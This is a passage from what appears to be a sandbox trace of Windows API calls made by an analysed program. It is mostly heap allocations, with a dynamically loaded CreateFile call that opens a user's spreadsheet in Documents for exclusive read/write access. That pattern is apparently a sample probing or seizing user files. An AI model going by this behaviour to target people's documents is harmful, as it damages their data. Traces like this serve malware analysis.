out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.148] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.148] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.150] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.150] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.150] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.150] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.150] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.153] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.155] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889a90 [0033.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889a90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.155] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\izle.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.155] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.155] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.156] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.156] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.156] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 